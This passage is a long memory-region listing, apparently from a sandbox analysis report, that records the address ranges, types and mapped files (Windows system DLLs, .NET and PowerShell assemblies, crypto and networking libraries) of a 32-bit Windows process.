filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 1596
start_va = 0x751c0000
end_va = 0x75216fff
monitored = 0
entry_point = 0x751d9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 1597
start_va = 0x733a0000
end_va = 0x733a8fff
monitored = 0
entry_point = 0x733a1220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 1598
start_va = 0x71770000
end_va = 0x71f1efff
monitored = 1
entry_point = 0x7178d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 1599
start_va = 0x71770000
end_va = 0x71f1efff
monitored = 1
entry_point = 0x7178d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 1600
start_va = 0x71770000
end_va = 0x71f1efff
monitored = 1
entry_point = 0x7178d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 1601
start_va = 0x73600000
end_va = 0x73613fff
monitored = 0
entry_point = 0x7360ac00
region_type = mapped_file
name = "vcruntime140_clr0400.dll"
filename = "\\Windows\\SysWOW64\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140_clr0400.dll")
Region:
id = 1602
start_va = 0x73550000
end_va = 0x735fafff
monitored = 0
entry_point = 0x735e5f20
region_type = mapped_file
name = "ucrtbase_clr0400.dll"
filename = "\\Windows\\SysWOW64\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase_clr0400.dll")
Region:
id = 1603
start_va = 0x90000
end_va = 0x90fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000090000"
filename = ""
Region:
id = 1604
start_va = 0x150000
end_va = 0x15ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000150000"
filename = ""
Region:
id = 1605
start_va = 0x1e0000
end_va = 0x1effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 1606
start_va = 0x1f0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 1607
start_va = 0x200000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1608
start_va = 0x250000
end_va = 0x25ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 1609
start_va = 0x2d0000
end_va = 0x3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002d0000"
filename = ""
Region:
id = 1610
start_va = 0x260000
end_va = 0x26ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 1611
start_va = 0x270000
end_va = 0x270fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 1612
start_va = 0x280000
end_va = 0x280fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000280000"
filename = ""
Region:
id = 1613
start_va = 0xa60000
end_va = 0xc2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 1614
start_va = 0x3d0000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1615
start_va = 0x470000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 1616
start_va = 0x490000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 1617
start_va = 0x8a0000
end_va = 0x8dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 1618
start_va = 0xa20000
end_va = 0xa5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a20000"
filename = ""
Region:
id = 1619
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 1620
start_va = 0x290000
end_va = 0x29ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 1621
start_va = 0x2560000
end_va = 0x455ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002560000"
filename = ""
Region:
id = 1622
start_va = 0x290000
end_va = 0x2affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 1623
start_va = 0x980000
end_va = 0x9bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000980000"
filename = ""
Region:
id = 1624
start_va = 0x9d0000
end_va = 0xa0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 1625
start_va = 0x7efd5000
end_va = 0x7efd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 1626
start_va = 0xa90000
end_va = 0xacffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a90000"
filename = ""
Region:
id = 1627
start_va = 0xb60000
end_va = 0xb9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b60000"
filename = ""
Region:
id = 1628
start_va = 0xbf0000
end_va = 0xc2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000bf0000"
filename = ""
Region:
id = 1629
start_va = 0x7efad000
end_va = 0x7efaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 1650
start_va = 0xc30000
end_va = 0xefefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1651
start_va = 0x70360000
end_va = 0x7176afff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll")
Region:
id = 1652
start_va = 0x2b0000
end_va = 0x2bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 1653
start_va = 0xf00000
end_va = 0x107ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f00000"
filename = ""
Region:
id = 1654
start_va = 0x2c0000
end_va = 0x2cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 1707
start_va = 0x6f900000
end_va = 0x70354fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll")
Region:
id = 1735
start_va = 0x6e0c0000
end_va = 0x6e8d7fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.core.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll")
Region:
id = 1763
start_va = 0x6ad10000
end_va = 0x6ad9efff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "microsoft.powershell.consolehost.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pb378ec07#\\731848746c032af3ce33577b793c9b9c\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.pb378ec07#\\731848746c032af3ce33577b793c9b9c\\microsoft.powershell.consolehost.ni.dll")
Region:
id = 1764
start_va = 0x738e0000
end_va = 0x738f6fff
monitored = 0
entry_point = 0x738e3573
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 1765
start_va = 0x3d0000
end_va = 0x40bfff
monitored = 0
entry_point = 0x3d128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1766
start_va = 0x430000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 1767
start_va = 0x3d0000
end_va = 0x40bfff
monitored = 0
entry_point = 0x3d128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1768
start_va = 0x3d0000
end_va = 0x40bfff
monitored = 0
entry_point = 0x3d128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1769
start_va = 0x3d0000
end_va = 0x40bfff
monitored = 0
entry_point = 0x3d128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1770
start_va = 0x3d0000
end_va = 0x40bfff
monitored = 0
entry_point = 0x3d128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1771
start_va = 0x738a0000
end_va = 0x738dafff
monitored = 0
entry_point = 0x738a128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1799
start_va = 0x6b760000
end_va = 0x6d242fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.management.automation.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Manaa57fc8cc#\\a68aa6199c81feadf8c95a4ea0254b2c\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.manaa57fc8cc#\\a68aa6199c81feadf8c95a4ea0254b2c\\system.management.automation.ni.dll")
Region:
id = 1824
start_va = 0x4d0000
end_va = 0x531fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll")
Region:
id = 1825
start_va = 0x900000
end_va = 0x93ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000900000"
filename = ""
Region:
id = 1826
start_va = 0xb20000
end_va = 0xb5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b20000"
filename = ""
Region:
id = 1827
start_va = 0xbb0000
end_va = 0xbeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000bb0000"
filename = ""
Region:
id = 1828
start_va = 0xf10000
end_va = 0xf4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f10000"
filename = ""
Region:
id = 1829
start_va = 0x1040000
end_va = 0x107ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001040000"
filename = ""
Region:
id = 1830
start_va = 0x7efa7000
end_va = 0x7efa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa7000"
filename = ""
Region:
id = 1831
start_va = 0x7efaa000
end_va = 0x7efacfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Region:
id = 1835
start_va = 0x940000
end_va = 0x97ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000940000"
filename = ""
Region:
id = 1836
start_va = 0xad0000
end_va = 0xb0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ad0000"
filename = ""
Region:
id = 1837
start_va = 0x7efa4000
end_va = 0x7efa6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa4000"
filename = ""
Region:
id = 1839
start_va = 0x74960000
end_va = 0x74972fff
monitored = 1
entry_point = 0x7496d900
region_type = mapped_file
name = "nlssorting.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll")
Region:
id = 1840
start_va = 0x4560000
end_va = 0x4831fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nlp"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp")
Region:
id = 1850
start_va = 0x4880000
end_va = 0x48bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 1851
start_va = 0x4950000
end_va = 0x498ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004950000"
filename = ""
Region:
id = 1852
start_va = 0x7efa1000
end_va = 0x7efa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa1000"
filename = ""
Region:
id = 1853
start_va = 0x6b050000
end_va = 0x6b75bfff
monitored = 1
entry_point = 0x6b66f392
region_type = mapped_file
name = "system.management.automation.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll")
Region:
id = 1854
start_va = 0x4990000
end_va = 0x509bfff
monitored = 1
entry_point = 0x4faf392
region_type = mapped_file
name = "system.management.automation.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll")
Region:
id = 1855
start_va = 0x6b050000
end_va = 0x6b75bfff
monitored = 1
entry_point = 0x6b66f392
region_type = mapped_file
name = "system.management.automation.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll")
Region:
id = 1856
start_va = 0xf50000
end_va = 0x100ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")
Region:
id = 1857
start_va = 0x6a600000
end_va = 0x6ad0bfff
monitored = 1
entry_point = 0x6ac1f392
region_type = mapped_file
name = "system.management.automation.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll")
Region:
id = 1858
start_va = 0x4990000
end_va = 0x4a4ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")
Region:
id = 1859
start_va = 0x75950000
end_va = 0x75954fff
monitored = 0
entry_point = 0x75951438
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")
Region:
id = 1865
start_va = 0x75be0000
end_va = 0x76829fff
monitored = 0
entry_point = 0x75c61601
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 1866
start_va = 0x3d0000
end_va = 0x3d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003d0000"
filename = ""
Region:
id = 1868
start_va = 0x76830000
end_va = 0x7685efff
monitored = 0
entry_point = 0x76832a35
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll")
Region:
id = 1870
start_va = 0x74ab0000
end_va = 0x74bd0fff
monitored = 0
entry_point = 0x74ab158e
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")
Region:
id = 1871
start_va = 0x76ed0000
end_va = 0x76edbfff
monitored = 0
entry_point = 0x76ed238e
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")
Region:
id = 1872
start_va = 0xfa0000
end_va = 0xfdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000fa0000"
filename = ""
Region:
id = 1873
start_va = 0x1080000
end_va = 0x10bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001080000"
filename = ""
Region:
id = 1874
start_va = 0x7efa7000
end_va = 0x7efa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa7000"
filename = ""
Region:
id = 1876
start_va = 0x3e0000
end_va = 0x3e7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "microsoft.powershell.utility.psm1"
filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")
Region:
id = 1877
start_va = 0xf60000
end_va = 0xf9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f60000"
filename = ""
Region:
id = 1878
start_va = 0x4ae0000
end_va = 0x4b1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ae0000"
filename = ""
Region:
id = 1879
start_va = 0x7ef9e000
end_va = 0x7efa0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9e000"
filename = ""
Region:
id = 1880
start_va = 0x74a20000
end_va = 0x74a27fff
monitored = 0
entry_point = 0x74a23bf5
region_type = mapped_file
name = "msisip.dll"
filename = "\\Windows\\SysWOW64\\msisip.dll" (normalized: "c:\\windows\\syswow64\\msisip.dll")
Region:
id = 1881
start_va = 0x4b20000
end_va = 0x4f1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004b20000"
filename = ""
Region:
id = 1882
start_va = 0x3f0000
end_va = 0x3f7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "microsoft.powershell.utility.psm1"
filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")
Region:
id = 1883
start_va = 0x4b20000
end_va = 0x4f1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004b20000"
filename = ""
Region:
id = 1884
start_va = 0x4a50000
end_va = 0x4a8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a50000"
filename = ""
Region:
id = 1885
start_va = 0x4b80000
end_va = 0x4bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b80000"
filename = ""
Region:
id = 1886
start_va = 0x6f7b0000
end_va = 0x6f7c5fff
monitored = 0
entry_point = 0x6f7b13df
region_type = mapped_file
name = "wshext.dll"
filename = "\\Windows\\SysWOW64\\wshext.dll" (normalized: "c:\\windows\\syswow64\\wshext.dll")
Region:
id = 1887
start_va = 0x7ef9b000
end_va = 0x7ef9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9b000"
filename = ""
Region:
id = 1888
start_va = 0x6eba0000
end_va = 0x6ec23fff
monitored = 0
entry_point = 0x6eba19a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 1889
start_va = 0x4bc0000
end_va = 0x4d1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bc0000"
filename = ""
Region:
id = 1890
start_va = 0x74950000
end_va = 0x74959fff
monitored = 0
entry_point = 0x74954ab0
region_type = mapped_file
name = "pwrshsip.dll"
filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\pwrshsip.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\pwrshsip.dll")
Region:
id = 1891
start_va = 0x4bc0000
end_va = 0x4cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bc0000"
filename = ""
Region:
id = 1892
start_va = 0x4d10000
end_va = 0x4d1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d10000"
filename = ""
Region:
id = 1937
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 2012
start_va = 0x900000
end_va = 0x93ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000900000"
filename = ""
Region:
id = 2013
start_va = 0x10b0000
end_va = 0x10effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010b0000"
filename = ""
Region:
id = 2014
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2037
start_va = 0x400000
end_va = 0x406fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2046
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2047
start_va = 0x400000
end_va = 0x406fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2051
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2052
start_va = 0x3f0000
end_va = 0x3f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2053
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2054
start_va = 0x3f0000
end_va = 0x3f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2055
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2056
start_va = 0x3f0000
end_va = 0x3f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2066
start_va = 0xf20000
end_va = 0xf5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f20000"
filename = ""
Region:
id = 2067
start_va = 0x4d20000
end_va = 0x4d5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d20000"
filename = ""
Region:
id = 2068
start_va = 0x7ef98000
end_va = 0x7ef9afff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef98000"
filename = ""
Region:
id = 2069
start_va = 0xfc0000
end_va = 0xffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000fc0000"
filename = ""
Region:
id = 2070
start_va = 0x4e30000
end_va = 0x4e6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e30000"
filename = ""
Region:
id = 2071
start_va = 0x7ef95000
end_va = 0x7ef97fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef95000"
filename = ""
Region:
id = 2144
start_va = 0x6af40000
end_va = 0x6b759fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.data.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Data\\df2dd09ed7c341842a104e1e668f184e\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.data\\df2dd09ed7c341842a104e1e668f184e\\system.data.ni.dll")
Region:
id = 2145
start_va = 0x6a9b0000
end_va = 0x6ad03fff
monitored = 1
entry_point = 0x6ace7a72
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 2146
start_va = 0x75960000
end_va = 0x75994fff
monitored = 0
entry_point = 0x7596145d
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")
Region:
id = 2149
start_va = 0x76960000
end_va = 0x76965fff
monitored = 0
entry_point = 0x76961782
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")
Region:
id = 2152
start_va = 0x4e70000
end_va = 0x51c0fff
monitored = 1
entry_point = 0x51a7a72
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 2154
start_va = 0x4e70000
end_va = 0x51c0fff
monitored = 1
entry_point = 0x51a7a72
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 2155
start_va = 0x4e70000
end_va = 0x51c0fff
monitored = 1
entry_point = 0x51a7a72
region_type = mapped_file
name = "system.data.dll"
